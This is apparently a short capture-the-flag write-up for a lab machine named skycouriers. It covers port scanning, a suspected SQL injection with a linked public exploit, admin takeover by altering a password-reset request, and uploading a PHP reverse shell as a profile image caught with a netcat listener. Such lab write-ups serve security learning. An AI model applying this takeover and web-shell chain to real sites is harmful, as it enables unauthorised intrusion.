Rustscan
rustscan -a 10.10.156.100
Output:
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Port 80
We found the domain name:
I have to add it to /etc/hostsskycoursiers.thm
Track Order
When I click on search it’s doing this request:
http://10.10.156.100/v2/admin/track_orders?awb=sdfsdf+sdf+sdf&srchorder=
But:
sqli
I just had to google awb=
to find this:
https://www.exploit-db.com/exploits/41113
We just need to exploit it.
It won’t work on this page because of the 404 error.
Let’s create an account an login.
Inside the pannel
http://skycouriers.thm/v2/ResetUser.php
With burpsuit:
Maybe I can also change the email adress to change the admin passwordadmin@sky.thm
It’s working, I’m logged as admin.
I can change my profile picture now.
Let’s upload php file with a revershell from pentest monkey.
I change the value in burp directly:
This is where the image is stored.
/v2/profileimages/revs.php
I listen nc -nlvp 4949
the open it:
http://skycouriers.thm/v2/profileimages/revs.php
Shell
Hint for later
.sudo_as_admin_successful
form webdeveloper
Root
I’m tired, my head hurt, I need to drink more water…